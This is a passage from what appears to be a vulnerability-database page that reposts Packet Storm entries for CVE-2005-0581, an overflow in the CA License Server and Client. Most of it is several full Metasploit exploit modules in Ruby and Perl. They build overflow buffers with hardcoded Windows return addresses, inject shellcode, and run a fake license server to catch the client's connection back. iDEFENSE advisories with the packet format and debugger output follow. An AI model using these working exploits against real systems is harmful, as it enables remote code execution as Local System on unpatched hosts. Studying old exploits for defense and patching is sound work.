				Windows and do not filter udp port 137, this should not be a
				problem (if the target is on the same network segment). Due to
				the bugginess of the software, you are only allowed one connection
				to the agent port before it starts ignoring you. If it wasn't for this
				issue, it would be possible to repeatedly exploit this bug.
			},
			'Author' => [
					'Thor Doomen <syscall [at] hushmail.com>', # original msf v2 module
					'patrick', # msf v3 port :)
				    ],
			'License' => MSF_LICENSE,
			'Version' => '$Revision: 8478 $',
			'References'	=>
				[
					[ 'CVE', '2005-0581' ],
					[ 'OSVDB', '14389' ],
					[ 'BID', '12705' ],
					[ 'URL', 'http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=213' ],
				],
			'Privileged' => true,
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'process',
				},
			'Payload' =>
				{
					'Space'	=> 600,
					'BadChars' => "\x00\x20",
					'StackAdjustment' => -3500,

				},
			'Platform'	=> 'win',
			'Targets' =>
				[
					# As much as I would like to return back to the DLL or EXE,
					# all of those modules have a leading NULL in the
					# loaded @ address :(
					# name, jmp esi, writable, jmp edi
					#['Automatic', {} ],
					#
					# patrickw - tested OK Windows XP English SP0-1 only 20100214
					['Windows 2000 English',	{ 'Rets' => [ 0x750217ae, 0x7ffde0cc, 0x75021421 ] } ], # ws2help.dll esi + peb + edi
					['Windows XP English SP0-1',	{ 'Rets' => [ 0x71aa16e5, 0x7ffde0cc, 0x71aa19e8 ] } ], # ws2help.dll esi + peb + edi
					['Windows XP English SP2',	{ 'Rets' => [ 0x71aa1b22, 0x71aa5001, 0x71aa1e08 ] } ], # ws2help.dll esi + .data + edi
					['Windows 2003 English SP0',	{ 'Rets' => [ 0x71bf175f, 0x7ffde0cc, 0x71bf1a2c ] } ], # ws2help.dll esi + peb + edi
				],
			'DisclosureDate' => 'Mar 02 2005'))

			register_options(
				[
					Opt::RPORT(10203),
					OptPort.new('SRVPORT', [ true, "Fake CA License Server Port", 10202 ]),
				], self.class)
	end
	
	#def check
		# It is possible to check, but due to a software bug, checking prevents exploitation
	#end

	def exploit
		if (connect)
			sock.put("A0 GETSERVER<EOM>\n")
			print_status("Initial packet sent to remote agent...")
			disconnect

			fakecaservice = Rex::Socket::TcpServer.create(
				'LocalHost' => '0.0.0.0',
				'LocalPort' => datastore['SRVPORT'],
				'SSL'       => false,
				'Context'   =>
					{
						'Msf'        => framework,
						'MsfExploit' => self,
					})

			fakecaservice.start
			print_status("Waiting for the license agent to connect back...")
			begin
				Timeout.timeout(3) do
					done = false
					while (not done and session = fakecaservice.accept)
						print_status("Accepted connection from agent #{Rex::Socket.source_address(rhost)}..")
						session.put("A0 GETCONFIG SELF 0<EOM>")
						req = session.recvfrom(2000)[0]
						next if not req
						next if req.empty?
										
						if (req =~ /OS\<([^\>]+)/)
							print_status("Target reports OS: #{$1}")
						end

						# exploits two different versions at once >:-)
						# 144 -> return address of esi points to string middle
						# 196 -> return address of edi points to string beginning	
						# 148 -> avoid exception by patching with writable address
						# 928 -> seh handler (not useful under XP SP2)
						buff = rand_text_alphanumeric(900)
						buff[142, 2] = Rex::Arch::X86.jmp_short(8) 		# jmp over addresses
						buff[144, 4] = [target['Rets'][0]].pack('V') 		# jmp esi
						buff[148, 4] = [target['Rets'][1]].pack('V')		# writable address
						buff[194, 2] = Rex::Arch::X86.jmp_short(4)		# jmp over address
						buff[196, 4] = [target['Rets'][2]].pack('V')		# jmp edi
						buff[272, payload.encoded.length] = payload.encoded

						sploit = "A0 GETCONFIG SELF #{buff}<EOM>"
						session.put(sploit)
						session.close
					end
				end
			ensure
				handler
				fakecaservice.close
				return
			end
		end
	end

end

=begin
eTrust: A0 GCR HOSTNAME<XXX>HARDWARE<xxxxxx>LOCALE<English>IDENT1<unknown>IDENT2<unknown>IDENT3<unknown>IDENT4<unknown>OS<Windows_NT 5.2>OLFFILE<0 0 0>SERVER<RMT>VERSION<0 1.61.0>NETWORK<192.168.3.22 unknown 255.255.255.0>MACHINE<PC_686_1_2084>CHECKSUMS<0 0 0 0 0 0 0 00 0 0 0>RMTV<1.3.1><EOM>
BrightStor: A0 GCR HOSTNAME<XXX>HARDWARE<xxxxxx>LOCALE<English>IDENT1<unknown>IDENT2<unknown>IDENT3<unknown>IDENT4<unknown>OS<Windows_NT 5.1>OLFFILE<0 0 0>SERVER<RMT>VERSION<3 1.54.0>NETWORK<11.11.11.111 unknown 255.255.255.0>MACHINE<DESKTOP>CHECKSUMS<0 0 0 0 0 0 0 0 0 0 0 0>RMTV<1.00><EOM>
lic98rmt.exe v0.1.0.15: A0 GCR HOSTNAME<XXX>HARDWARE<xxxxxx>LOCALE<English>IDENT1<unknown>IDENT2<unknown>IDENT3<unknown>IDENT4<unknown>OS<Windows_NT 5.1>OLFFILE<0 0 0>SERVER<RMT>VERSION<3 1.61.0>NETWORK<192.168.139.128 unknown 255.255.255.0>MACHINE<DESKTOP>CHECKSUMS<0 0 0 0 0 0 0 0 0 0 0 0>RMTV<1.00><EOM>
=end

    

- 漏洞信息 (F86298)

Computer Associates License Server GETCONFIG Overflow (PacketStormID:F86298)
2010-02-15 00:00:00
patrick,Thor Doomen  metasploit.com
exploit
CVE-2005-0581
[点击下载]

This Metasploit module exploits an vulnerability in the CA License Server network service. By sending an excessively long GETCONFIG packet the stack may be overwritten.

##
# $Id: calicserv_getconfig.rb 8478 2010-02-13 16:16:13Z patrickw $
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = NormalRanking

	include Msf::Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,	
			'Name' => 'Computer Associates License Server GETCONFIG Overflow',
			'Description'	=> %q{
				This module exploits an vulnerability in the CA License Server
				network service. By sending an excessively long GETCONFIG
				packet the stack may be overwritten.
			},
			'Author' => [
					'Thor Doomen <syscall [at] hushmail.com>', # original msf v2 module
					'patrick', # msf v3 port :)
				    ],
			'License' => MSF_LICENSE,
			'Version' => '$Revision: 8478 $',
			'References'	=>
				[
					[ 'CVE', '2005-0581' ],
					[ 'OSVDB', '14389' ],
					[ 'BID', '12705' ],
					[ 'URL', 'http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=213' ],
				],
			'Privileged' => true,
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'process',
				},
			'Payload' =>
				{
					'Space'	=> 600,
					'BadChars' => "\x00\x20",
					'StackAdjustment' => -3500,

				},
			'Platform'	=> 'win',
			'Targets' =>
				[
					# As much as I would like to return back to the DLL or EXE,
					# all of those modules have a leading NULL in the
					# loaded @ address :(
					# name, jmp esi, writable, jmp edi
					#['Automatic', {} ],
					#
					# patrickw - tested OK Windows XP English SP0-1 only 20100214
					['Windows 2000 English',	{ 'Rets' => [ 0x750217ae, 0x7ffde0cc, 0x75021421 ] } ], # ws2help.dll esi + peb + edi
					['Windows XP English SP0-1',	{ 'Rets' => [ 0x71aa16e5, 0x7ffde0cc, 0x71aa19e8 ] } ], # ws2help.dll esi + peb + edi
					['Windows XP English SP2',	{ 'Rets' => [ 0x71aa1b22, 0x71aa5001, 0x71aa1e08 ] } ], # ws2help.dll esi + .data + edi
					['Windows 2003 English SP0',	{ 'Rets' => [ 0x71bf175f, 0x7ffde0cc, 0x71bf1a2c ] } ], # ws2help.dll esi + peb + edi
				],
			'DisclosureDate' => 'Mar 02 2005'))

			register_options(
				[
					Opt::RPORT(10202),
				], self.class)
	end
	
	def check
		connect
		banner = sock.get_once
		sock.put("A0 GETCONFIG SELF 0<EOM>")
		res = sock.get_once
		disconnect
		if (res =~ /OS\<([^\>]+)/)
			print_status("CA License Server reports OS: #{$1}")
			return Exploit::CheckCode::Detected
		end
		return Exploit::CheckCode::Safe
	end

	def exploit
		connect
		banner = sock.get_once
		if (banner !~ /GETCONFIG/)
			print_status("The server did not return the expected greeting!")
		end

		# exploits two different versions at once >:-)
		# 144 -> return address of esi points to string middle
		# 196 -> return address of edi points to string beginning	
		# 148 -> avoid exception by patching with writable address
		# 928 -> seh handler (not useful under XP SP2)
		buff = rand_text_alphanumeric(900)
		buff[142, 2] = Rex::Arch::X86.jmp_short(8) 		# jmp over addresses
		buff[144, 4] = [target['Rets'][0]].pack('V') 		# jmp esi
		buff[148, 4] = [target['Rets'][1]].pack('V')		# writable address
		buff[194, 2] = Rex::Arch::X86.jmp_short(4)		# jmp over address
		buff[196, 4] = [target['Rets'][2]].pack('V')		# jmp edi
		buff[272, payload.encoded.length] = payload.encoded

		sploit = "A0 GETCONFIG SELF #{buff}<EOM>"
		sock.put(sploit)
		
		handler
		disconnect
	end

end

=begin
eTrust: A0 GCR HOSTNAME<XXX>HARDWARE<xxxxxx>LOCALE<English>IDENT1<unknown>IDENT2<unknown>IDENT3<unknown>IDENT4<unknown>OS<Windows_NT 5.2>OLFFILE<0 0 0>SERVER<RMT>VERSION<0 1.61.0>NETWORK<192.168.3.22 unknown 255.255.255.0>MACHINE<PC_686_1_2084>CHECKSUMS<0 0 0 0 0 0 0 00 0 0 0>RMTV<1.3.1><EOM>
BrightStor: A0 GCR HOSTNAME<XXX>HARDWARE<xxxxxx>LOCALE<English>IDENT1<unknown>IDENT2<unknown>IDENT3<unknown>IDENT4<unknown>OS<Windows_NT 5.1>OLFFILE<0 0 0>SERVER<RMT>VERSION<3 1.54.0>NETWORK<11.11.11.111 unknown 255.255.255.0>MACHINE<DESKTOP>CHECKSUMS<0 0 0 0 0 0 0 0 0 0 0 0>RMTV<1.00><EOM>
lic98rmt.exe v0.1.0.15: A0 GCR HOSTNAME<XXX>HARDWARE<xxxxxx>LOCALE<English>IDENT1<unknown>IDENT2<unknown>IDENT3<unknown>IDENT4<unknown>OS<Windows_NT 5.1>OLFFILE<0 0 0>SERVER<RMT>VERSION<3 1.61.0>NETWORK<192.168.139.128 unknown 255.255.255.0>MACHINE<DESKTOP>CHECKSUMS<0 0 0 0 0 0 0 0 0 0 0 0>RMTV<1.00><EOM>
=end

    

- 漏洞信息 (F82942)

CA BrightStor ARCserve License Service GCR NETWORK Buffer Overflow (PacketStormID:F82942)
2009-11-26 00:00:00
MC  metasploit.com
exploit,overflow,arbitrary
CVE-2005-0581
[点击下载]

This Metasploit module exploits a stack overflow in Computer Associates BrightStor ARCserve Backup 11.0. By sending a specially crafted request to the lic98rmtd.exe service, an attacker could overflow the buffer and execute arbitrary code.

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,	
			'Name'           => 'CA BrightStor ARCserve License Service GCR NETWORK Buffer Overflow',
			'Description'    => %q{
				This module exploits a stack overflow in Computer Associates BrightStor ARCserve Backup 11.0. 
				By sending a specially crafted request to the lic98rmtd.exe service, an attacker 
				could overflow the buffer and execute arbitrary code.
			},
			'Author'         => [ 'MC' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision$',
			'References'     =>
				[
					[ 'CVE', '2005-0581' ],
					[ 'OSVDB', '14389' ],
					[ 'BID', '12705' ],
				],
			'Privileged'     => true,
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'thread',
				},
			'Payload'        =>
				{
					'Space'    => 500,
					'BadChars' => "\x00\x09\x0a\x0d\x20\x0c\x25\x26\x27\x0b\x2b\x2f\x3a\x3c\x3e\x3f\x40",
					'StackAdjustment' => -3500,
					'PrependEncoder' => "\x81\xc4\xff\xef\xff\xff\x44",
				},
			'Platform' => 'win',
			'Targets'  =>
					[ 
						[ 'Windows 2003 SP0 English',     { 'Ret' => 0x71ae1f9b } ], # JMP ESP wshtcpip.dll
						[ 'Windows 2000 SP4 English',     { 'Ret' => 0x7c30d043 } ], # JMP ESP advapi32.dll
					],	
			'DisclosureDate' => 'Mar 2 2005',
			'DefaultTarget' => 0))

			register_options([ Opt::RPORT(10202) ], self.class)	
	end

	def exploit
		connect

		buff =  rand_text_alpha_upper(256) + [target.ret].pack('V')
		buff << make_nops(12) + payload.encoded

		# NETWORK<x.x.x.x buff x.x.x.x.x> ... worked for me.	
		sploit  = "A0 GCR NETWORK<#{buff}>RMTV<1.00><EOM>"
		
		print_status("Trying target #{target.name}...")
		
		sock.puts(sploit)
		
		handler
		disconnect
	end

end
    

- 漏洞信息 (F36485)

101_cali.c (PacketStormID:F36485)
2005-03-12 00:00:00
class101  class101.org
exploit,overflow
CVE-2005-0581
[点击下载]

This exploit takes advantage of a stack overflow vulnerability in the CA License Server network service. Versions 1.61 and below are susceptible.

- 漏洞信息 (F36463)

calicserv_getconfig.pm (PacketStormID:F36463)
2005-03-05 00:00:00
Thor Doomen  
exploit,overflow
CVE-2005-0581
[点击下载]

This module exploits an vulnerability in the CA License Server network service. This is a simple stack overflow and just one of many serious problems with this software.

##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##

package Msf::Exploit::calicserv_getconfig;
use base "Msf::Exploit";
use strict;
use Pex::Text;

my $advanced = { };

my $info =
  {
	'Name'  => 'CA License Server GETCONFIG Overflow',
	'Version'  => '$Revision: 1.8 $',
	'Authors' => [ 'Thor Doomen <syscall [at] hushmail.com>' ],
	'Arch'  => [ 'x86' ],
	'OS'    => [ 'win32', 'win2000', 'winxp', 'win2003' ],
	'Priv'  => 1,
	'AutoOpts'  => { 'EXITFUNC' => 'thread' },
	'UserOpts'  => {
		'RHOST' => [1, 'ADDR', 'The target address'],
		'RPORT' => [1, 'PORT', 'The target port', 10202],
	  },

	'Payload' =>
	  {
		'Space'		=> 600,
		'BadChars'	=> "\x00\x20",
		'Prepend'	=> "\x81\xc4\x54\xf2\xff\xff",
		'Keys'		=> ['+ws2ord'],
	  },

	'Description'  => Pex::Text::Freeform(qq{
        This module exploits an vulnerability in the CA License Server
        network service. This is a simple stack overflow and just one of
        many serious problems with this software.
}),

	'Refs'    =>
	  [
		['BID', '12705'],
		['CVE', '005-0581'],
		['URL', 'http://www.idefense.com/application/poi/display?id=213&type=vulnerabilities'],
	  ],

	'Targets' => [

		# As much as I would like to return back to the DLL or EXE,
		# all of those modules have a leading NULL in the
		# loaded @ address :(

		['Automatic', 0],
		['Windows 2000 English',         0x750217ae, 0x7ffde0cc], # ws2help.dll esi + peb
		['Windows XP English SP0-1',     0x71aa16e5, 0x7ffde0cc], # ws2help.dll esi + peb
		['Windows XP English SP2',       0x71aa1b22, 0x71aa5001], # ws2help.dll esi + .data
		['Windows 2003 English SP0',     0x71bf175f, 0x7ffde0cc], # ws2help.dll esi + peb
	  ],
	'Keys'  => ['calicense'],
  };

sub new {
	my $class = shift;
	my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
	return($self);
}

sub Check {
	my $self = shift;
	my $target_host = $self->GetVar('RHOST');
	my $target_port = $self->GetVar('RPORT');
	my $data = $self->GetConfig($target_host, $target_port);
	if (! $data) {
		$self->PrintLine("[*] Could not read remote configuration");
		return $self->CheckCode('Connect');
	}

	$self->PrintLine("[*] License Server: $data");
	return $self->CheckCode('Detected');
}

sub Exploit {
	my $self = shift;
	my $target_host = $self->GetVar('RHOST');
	my $target_port = $self->GetVar('RPORT');
	my $target_idx  = $self->GetVar('TARGET');
	my $shellcode   = $self->GetVar('EncodedPayload')->Payload;
	my $target = $self->Targets->[$target_idx];

	if ($target_idx == 0) {
		my $data = $self->GetConfig($target_host, $target_port);
		if ($data =~ m/OS\<([^\>]+)/) {
			my $os = $1;
			$os =~ s/_NT//g;
			$os =~ s/5\.1/XP/;
			$os =~ s/5\.2/2003/;
			$os =~ s/5\.0/2000/;
			$os =~ s/4\.0/NT 4.0/;

			my @targs;
			for (1 .. (scalar(@{$self->Targets})-1)) {
				if (index($self->Targets->[$_]->[0], $os) != -1) {
					push @targs, $_;
				}
			}

			if (scalar(@targs) > 1) {
				$self->PrintLine("[*] Multiple possible targets:");
				foreach (@targs) {
					$self->PrintLine("[*]  $_\t".$self->Targets->[$_]->[0]);
				}
				return;
			}

			if (scalar(@targs) == 1) {
				$target = $self->Targets->[$targs[0]];
			}

			if (! scalar(@targs)) {
				$self->PrintLine("[*] No matching target for $os");
				return;
			}

		} else {
			$self->PrintLine("[*] Could not determine the remote OS automatically");
			return;
		}
	}

	$self->PrintLine("[*] Attempting to exploit target " . $target->[0]);

	my $s = Msf::Socket::Tcp->new
	  (
		'PeerAddr'  => $target_host,
		'PeerPort'  => $target_port,
		'LocalPort' => $self->GetVar('CPORT'),
		'SSL'       => $self->GetVar('SSL'),
	  );

	if ($s->IsError) {
		$self->PrintLine('[*] Error creating socket: ' . $s->GetError);
		return;
	}

	# Read the initial greeting from the license server
	my $res = $s->Recv(-1, 1);
	if (! $res || $res !~ /GETCONFIG/) {
		$self->PrintLine("[*] The server did not return the expected greeting");
		return;
	}

	my $boom = Pex::Text::EnglishText(900);

	# 144 -> original return address
	# 148 -> avoid exception by patching with writable address
	# 928 -> seh handler (not useful under XP SP2)

	substr($boom, 144, 4, pack('V', $target->[1]));     # jmp esi
	substr($boom, 148, 4, pack('V', $target->[2]));     # writable address
	substr($boom, 272, length($shellcode), $shellcode);

	my $req = "A0 GETCONFIG SELF $boom<EOM>";

	$self->PrintLine("[*] Sending " .length($req) . " bytes to remote host.");
	$s->Send($req);

	return;
}

# Returns data in the following format
#A0 GCR HOSTNAME<BOOFERM>HARDWARE<009c059010204>LOCALE<English>IDENT1<unknown>IDENT2<unknown>IDENT3<unknown>IDENT4<unknown>OS<Windows_NT 5.1>OLFFILE<0 0 0>SERVER<RMT>VERSION<3 1.54.0>NETWORK<11.11.11.111 unknown 255.255.255.0>MACHINE<DESKTOP>CHECKSUMS<0 0 0 0 0 0 0 0 0 0 0 0>RMTV<1.00><EOM>

sub GetConfig {
	my $self = shift;
	my $target_host = shift;
	my $target_port = shift;

	my $s = Msf::Socket::Tcp->new
	  (
		'PeerAddr'  => $target_host,
		'PeerPort'  => $target_port,
		'LocalPort' => $self->GetVar('CPORT'),
		'SSL'       => $self->GetVar('SSL'),
	  );

	if ($s->IsError) {
		$self->PrintLine('[*] Error creating socket: ' . $s->GetError);
		return;
	}

	# Recieve the message that is first sent
	$s->Recv(-1, 1);

	# Ask for the configuration info
	$s->Send("A0 GETCONFIG SELF 0<EOM>");
	my $res = $s->Recv(-1, 2);

	# Close the socket
	$s->Close;

	# Return the data
	return $res;
}

1;

    

- 漏洞信息 (F36462)

calicclnt_getconfig.pm (PacketStormID:F36462)
2005-03-05 00:00:00
Thor Doomen  
exploit,local,udp
windows
CVE-2005-0581
[点击下载]

This module exploits a vulnerability in the CA License Client service. This exploit will only work if your IP address will resolve to the target system. This can be accomplished on a local network by running the nmbd service that comes with Samba. If you are running this exploit from Windows and do not filter udp port 137, this should not be a problem (if the target is on the same network segment). Due to the bugginess of the software, you are only allowed one connection to the agent port before it starts ignoring you. If it was not for this issue, it would be possible to repeatedly exploit this bug.

##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##

package Msf::Exploit::calicclnt_getconfig;
use base "Msf::Exploit";
use strict;
use Pex::Text;

use IO::Socket;
use IO::Select;

my $advanced = { };

my $info =
  {
	'Name'  => 'CA License Client GETCONFIG Overflow',
	'Version'  => '$Revision: 1.7 $',
	'Authors' => [ 'Thor Doomen <syscall [at] hushmail.com>' ],
	'Arch'  => [ 'x86' ],
	'OS'    => [ 'win32', 'win2000', 'winxp', 'win2003' ],
	'Priv'  => 1,
	'AutoOpts'  => { 'EXITFUNC' => 'process' }, # avoid the ugly pop-up
	'UserOpts'  => {
		'RHOST' => [1, 'ADDR', 'The target address'],
		'RPORT' => [1, 'PORT', 'The target port', 10203],
	  },

	'Payload' =>
	  {
		'Space'		=> 600,
		'BadChars'	=> "\x00\x20",
		'Prepend'	=> "\x81\xc4\x54\xf2\xff\xff",
		'Keys'		=> ['+ws2ord'],
	  },

	'Description'  => Pex::Text::Freeform(qq{
        This module exploits an vulnerability in the CA License Client
        service. This exploit will only work if your IP address will 
        resolve to the target system. This can be accomplished on a local
        network by running the 'nmbd' service that comes with Samba. If
        you are running this exploit from Windows and do not filter udp
        port 137, this should not be a problem (if the target is on the same
        network segment). Due to the bugginess of the software, you are
        only allowed one connection to the agent port before it starts
        ignoring you. If it wasn't for this issue, it would be possible to
        repeatedly exploit this bug.
        
}),

	'Refs'    =>
	  [
		['BID', '12705'],
		['CVE', '005-0581'],
		['URL', 'http://www.idefense.com/application/poi/display?id=213&type=vulnerabilities'],
	  ],

	'Targets' => [

		# As much as I would like to return back to the DLL or EXE,
		# all of those modules have a leading NULL in the
		# loaded @ address :(

		['Automatic', 0],
		['Windows 2000 English',         0x750217ae, 0x7ffde0cc], # ws2help.dll esi + peb
		['Windows XP English SP0-1',     0x71aa16e5, 0x7ffde0cc], # ws2help.dll esi + peb
		['Windows XP English SP2',       0x71aa1b22, 0x71aa5001], # ws2help.dll esi + .data
		['Windows 2003 English SP0',     0x71bf175f, 0x7ffde0cc], # ws2help.dll esi + peb
	  ],
	'Keys'  => ['calicense'],
  };

sub new {
	my $class = shift;
	my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
	return($self);
}

sub Exploit {
	my $self = shift;
	my $target_host = $self->GetVar('RHOST');
	my $target_port = $self->GetVar('RPORT');
	my $target_idx  = $self->GetVar('TARGET');
	my $shellcode   = $self->GetVar('EncodedPayload')->Payload;
	my $target = $self->Targets->[$target_idx];

	my $server = IO::Socket::INET->new
	  (
		'LocalPort' => 10202,
		'Proto'     => 'tcp',
		'ReuseAddr' => 1,
		'Listen'    => 5,
		'Blocking'  => 0,
	  );

	if (! $server) {
		$self->PrintLine("[*] Could not start the fake CA License Server: $!");
		return;
	}
	my $sel = IO::Select->new($server);

	# 1: Connect to the agent and send a request
	my $s = Msf::Socket::Tcp->new
	  (
		'PeerAddr'  => $target_host,
		'PeerPort'  => $target_port,
		'LocalPort' => $self->GetVar('CPORT'),
		'SSL'       => $self->GetVar('SSL'),
	  );

	if ($s->IsError) {
		$self->PrintLine("[*] Could not connect to the client agent");
		$server->shutdown(2);
		$server->close;
		return;
	}

	$s->Send("A0 GETSERVER<EOM>\n");
	$self->PrintLine("[*] Waiting for the license agent to connect back...");

	my $r = $s->Recv(-1, 3);

	# 2: Wait for a connection from the agent back to us
	my @ready = $sel->can_read(8);
	if (! scalar(@ready)) {
		$self->PrintLine("[*] No connection was received from the agent >:(");
		$s->Close;
		$server->shutdown(2);
		$server->close;
		return;
	}

	# 3: Accept the connection and determine target type if needed
	my $agent_soc = $ready[0]->accept();
	my $agent = Msf::Socket::Tcp->new_from_socket($agent_soc);
	$self->PrintLine("[*] Accepted connection from agent ".$agent->PeerAddr);

	if ($target_idx == 0) {

		$agent->Send("A0 GETCONFIG SELF 0<EOM>");
		my $data = $agent->Recv(-1, 2);

		if ($data =~ m/OS\<([^\>]+)/) {
			my $os = $1;
			$os =~ s/_NT//g;
			$os =~ s/5\.1/XP/;
			$os =~ s/5\.2/2003/;
			$os =~ s/5\.0/2000/;
			$os =~ s/4\.0/NT 4.0/;

			my @targs;
			for (1 .. (scalar(@{$self->Targets})-1)) {
				if (index($self->Targets->[$_]->[0], $os) != -1) {
					push @targs, $_;
				}
			}

			if (scalar(@targs) > 1) {
				$self->PrintLine("[*] Multiple possible targets:");
				foreach (@targs) {
					$self->PrintLine("[*]  $_\t".$self->Targets->[$_]->[0]);
				}
				$self->PrintLine("[*] Picking the closest target and hoping...");
				return;
			}

			if (scalar(@targs)) {
				$target = $self->Targets->[$targs[0]];
			}

			if (! scalar(@targs)) {
				$self->PrintLine("[*] No matching target for $os");
				return;
			}

		} else {
			$self->PrintLine("[*] Could not determine the remote OS automatically");
			return;
		}
	}

	$self->PrintLine("[*] Attempting to exploit target " . $target->[0]);

	my $boom = Pex::Text::EnglishText(900);

	# 144 -> original return address
	# 148 -> avoid exception by patching with writable address
	# 928 -> seh handler (not useful under XP SP2)

	substr($boom, 144, 4, pack('V', $target->[1]));     # jmp esi
	substr($boom, 148, 4, pack('V', $target->[2]));     # writable address
	substr($boom, 272, length($shellcode), $shellcode);

	my $req = "A0 GETCONFIG SELF $boom<EOM>";

	$self->PrintLine("[*] Sending " .length($req) . " bytes to remote host.");
	$agent->Send($req);

	$server->shutdown(2);
	$agent->Close;
	$s->Close;

	return;
}

1;
    

- 漏洞信息 (F36434)

iDEFENSE Security Advisory 2005-03-02.6 (PacketStormID:F36434)
2005-03-03 00:00:00
iDefense Labs  idefense.com
advisory,remote,overflow,arbitrary,local
CVE-2005-0581
[点击下载]

iDEFENSE Security Advisory 03.02.05 - Remote exploitation of a buffer overflow vulnerability in Computer Associates License Server and License Client can allow attackers to execute arbitrary code. The vulnerability specifically exists due to insufficient bounds checking on user-supplied values in GCR requests. Exploitation allows remote attackers to execute arbitrary code under the privileges of Local System.

Computer Associates License Client/Server GCR Checksum Buffer Overflow 

iDEFENSE Security Advisory 03.02.05
www.idefense.com/application/poi/display?id=215&type=vulnerabilities
March 2, 2005

I. BACKGROUND

The Computer Associates License Client/Server applications provide a 
method for CA products to register their licenses on the network. The 
License Client and Server are distributed with almost all CA software 
distributions. More information about Computer Associates software 
products is available from:

   http://www3.ca.com/Products/

II. DESCRIPTION

Remote exploitation of a buffer overflow vulnerability in Computer 
Associates License Server and License Client can allow attackers to 
execute arbitrary code.

The vulnerability specifically exists due to insufficient bounds 
checking on user-supplied values in GCR requests. The GCR request 
packet format is shown below:

A0 GCR HOSTNAME<DEVBOX>HARDWARE<001122334455>LOCALE<English>
IDENT1<unknown>IDENT2<unknown>IDENT3<unknown>IDENT4<unknown>
OS<Windows_NT 5.0>OLFFILE<0 0 0>SERVER<RMT>VERSION<3 1.54.0>
NETWORK<127.0.0.1 HOSTNAME 255.255.255.0>MACHINE<PC_1586_1_3201>
CHECKSUMS<1 2 3 4 5 6 7 8 9 10 11 12>RMTV<1.00><EOM>

If the second, fifth, eighth, or eleventh field of the Checksums item 
contains a large string, a stack overflow will occur. The format 
specifier for the call to sscanf() is simply:

"%x %s %i %x %s %i %x %s %i %x %s %i"

If the eleventh field is used to overflow the local stack buffer, the 
return address will be overwritten with the address at 64 bytes into 
the overflow string.

Ollydbg output after SEH overwrite in CA License Client:

EAX 00630510
ECX 7C91056D ntdll.7C91056D
EDX 003B0000
EBX 00D4E053 ASCII "GCR"
ESP 0082FC10 ASCII "XXXXXXXXXXXXXXXXXXXXXXXXXXXXX
EBP 00D4E050 ASCII "A0"
ESI 0082FCBC ASCII "XXXXXXXXXXXXXXXXXXXXXXXXXXXXX
EDI 00D4E057 ASCII "HOSTNAME<DEVBOX>HARDWARE<0011
EIP DEADC0DE

Log data, item 0
Address=DEADC0DE
Message=Access violation when executing [DEADC0DE]

III. ANALYSIS

Exploitation allows remote attackers to execute arbitrary code under 
the privileges of Local System. A GETCONFIG packet exchange which 
discloses the remote operating system version usually proceeds the GCR 
request and increases the likelihood of successful exploitation. The CA 
License Server does not run by default, but is packaged with most 
Computer Associates software distributions. The CA License Client does 
run by default and is packaged with almost all Computer Associates 
software.

IV. DETECTION

iDEFENSE has confirmed that CA License Server 0.1.0.15 and CA License 
Client 0.1.0.15 are vulnerable. 

V. WORKAROUND

Use a firewall to only allow trusted hosts to connect to the Computer 
Associates License Server and Client ports. 

VI. VENDOR RESPONSE

A vendor advisory for this issue is available at:

http://supportconnectw.ca.com/public/ca_common_docs/security_notice.asp

Patches for this issue are available at:

http://supportconnectw.ca.com/public/reglic/downloads/licensepatch.asp#a
lp

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CAN-2005-0581 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org), which standardizes names for
security problems. This is one of several overflows that have been
assigned CAN-2005-0581.

VIII. DISCLOSURE TIMELINE

12/01/2004  Initial vendor notification
12/01/2004  Initial vendor response
03/02/2005  Coordinated public disclosure

IX. CREDIT

An anonymous contributor is credited with discovering this 
vulnerability.

Get paid for vulnerability research 
http://www.idefense.com/poi/teams/vcp.jsp

Free tools, research and upcoming events
http://labs.idefense.com

X. LEGAL NOTICES

Copyright (c) 2005 iDEFENSE, Inc.

Permission is granted for the redistribution of this alert 
electronically. It may not be edited in any way without the express 
written consent of iDEFENSE. If you wish to reprint the whole or any 
part of this alert in any other medium other than electronically, 
please email customerservice@idefense.com for permission.

Disclaimer: The information in the advisory is believed to be accurate 
at the time of publishing based on currently available information. Use 
of the information constitutes acceptance for use in an AS IS 
condition. There are no warranties with regard to this information. 
Neither the author nor the publisher accepts any liability for any 
direct, indirect, or consequential loss or damage arising from use of, 
or reliance on, this information.

    

- 漏洞信息 (F36433)

iDEFENSE Security Advisory 2005-03-02.5 (PacketStormID:F36433)
2005-03-03 00:00:00
iDefense Labs  idefense.com
advisory,remote,overflow,arbitrary
CVE-2005-0581
[点击下载]

iDEFENSE Security Advisory 03.02.05 - Remote exploitation of a buffer overflow vulnerability in Computer Associates License Server and License Client can allow attackers to execute arbitrary code. The vulnerability specifically exists due to insufficient bounds checking on user-supplied values in GCR requests.

Computer Associates License Client/Server GCR Network Buffer Overflow 

iDEFENSE Security Advisory 03.02.05
www.idefense.com/application/poi/display?id=214&type=vulnerabilities
March 2, 2005

I. BACKGROUND

The Computer Associates License Client/Server applications provide a 
method for CA products to register their licenses on the network. The 
